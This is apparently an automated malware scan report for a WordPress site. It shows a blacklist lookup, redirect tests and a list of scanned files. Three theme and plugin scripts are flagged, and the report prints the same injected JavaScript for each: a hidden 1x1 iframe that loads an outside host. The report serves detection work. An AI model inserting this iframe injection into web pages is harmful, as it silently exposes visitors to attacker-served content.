Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=turalmeria.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thaynie.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Dec 2014 02:02:39 GMT
Pragma: no-cache
Location: http://www.thaynie.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=vu28e9j7jmspmiohhh7t21l7s6; path=/
X-Pingback: http://www.thaynie.com/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: thaynie.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Dec 2014 02:02:39 GMT
Pragma: no-cache
Location: http://www.thaynie.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=vu28e9j7jmspmiohhh7t21l7s6; path=/
X-Pingback: http://www.thaynie.com/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: thaynie.com
Referer: http://www.google.com/search?q=thaynie.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thaynie.com
Referer: http://www.google.com/search?q=thaynie.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://turalmeria.com/ | 200 OK Content-Length: 129337 Content-Type: text/html | clean |
http://turalmeria.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://turalmeria.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://turalmeria.com/wp-content/themes/flexibility3/js/superfish.js?ver=3.8.1 | 200 OK Content-Length: 4017 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var j = document.createElement('iframe'); j.src = 'http://metra3.sk/counter.php'; j.style.position = 'absolute'; j.style.border = '0'; j.style.height = '1px'; j.style.width = '1px'; j.style.left = '1px'; j.style.top = '1px'; if (!document.getElementById('j')) { document.write('<div id=\'j\'></div>'); document.getElementById('j').appendChild(j); }})(); Antivirus reports:
| ||
http://turalmeria.com/wp-content/plugins/sharebar/js/sharebar.js?ver=3.8.1 | 200 OK Content-Length: 2695 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var j = document.createElement('iframe'); j.src = 'http://metra3.sk/counter.php'; j.style.position = 'absolute'; j.style.border = '0'; j.style.height = '1px'; j.style.width = '1px'; j.style.left = '1px'; j.style.top = '1px'; if (!document.getElementById('j')) { document.write('<div id=\'j\'></div>'); document.getElementById('j').appendChild(j); }})(); Antivirus reports:
| ||
http://turalmeria.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js?ver=4.0.2 | 200 OK Content-Length: 1537 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var j = document.createElement('iframe'); j.src = 'http://metra3.sk/counter.php'; j.style.position = 'absolute'; j.style.border = '0'; j.style.height = '1px'; j.style.width = '1px'; j.style.left = '1px'; j.style.top = '1px'; if (!document.getElementById('j')) { document.write('<div id=\'j\'></div>'); document.getElementById('j').appendChild(j); }})(); Antivirus reports:
| ||
http://memorylaneantiquemall.com/fbmrwfnx.php?id=55273052 | 200 OK Content-Length: 1 Content-Type: text/html | clean |
http://memorylaneantiquemall.com/test404page.js | 404 Not Found Content-Length: 518 Content-Type: text/html | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 160503 Content-Type: application/x-javascript | clean |
http://widgets.twimg.com/j/2/widget.js | 200 OK Content-Length: 1489 Content-Type: application/javascript | clean |
http://turalmeria.com//s7.addthis.com/js/250/addthis_widget.js/ | HTTP/1.1 302 Found Connection: close Date: Fri, 26 Dec 2014 01:33:41 GMT Location: http://www.gogvo.com/404.html Server: Apache Content-Length: 213 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.gogvo.com/404.html | HTTP/1.1 200 OK Connection: close Date: Fri, 26 Dec 2014 01:33:42 GMT Accept-Ranges: bytes ETag: "2bd0007-d6-4e9923a08e0c0" Server: Apache Content-Length: 214 Content-Type: text/html; charset=UTF-8 Last-Modified: Fri, 25 Oct 2013 15:15:55 GMT | clean |
http://www.joeltherien.com/go/pureleverage | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 26 Dec 2014 01:33:50 GMT Location: http://www.instantincomesystem.com/?id=rhanlin2014 Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.13 | malicious |
http://www.instantincomesystem.com/?id=rhanlin2014 | 200 OK Content-Length: 7464 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.10.1/jquery.min.js | 200 OK Content-Length: 93057 Content-Type: text/javascript | clean |
http://turalmeria.com//s7.addthis.com/js/250/addthis_widget.js/jquery-ui/jquery-ui.min.js/ | HTTP/1.1 302 Found Connection: close Date: Fri, 26 Dec 2014 01:33:44 GMT Location: http://www.gogvo.com/404.html Server: Apache Content-Length: 213 Content-Type: text/html; charset=iso-8859-1 | clean |
http://gogvo.com/js/cpa_with_cookies.js | 200 OK Content-Length: 1274 Content-Type: text/javascript | clean |
http://turalmeria.com/wp-content/plugins/tweetmeme/button.js | 200 OK Content-Length: 3779 Content-Type: application/javascript | clean |
http://turalmeria.com/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52 | 200 OK Content-Length: 24152 Content-Type: application/javascript | clean |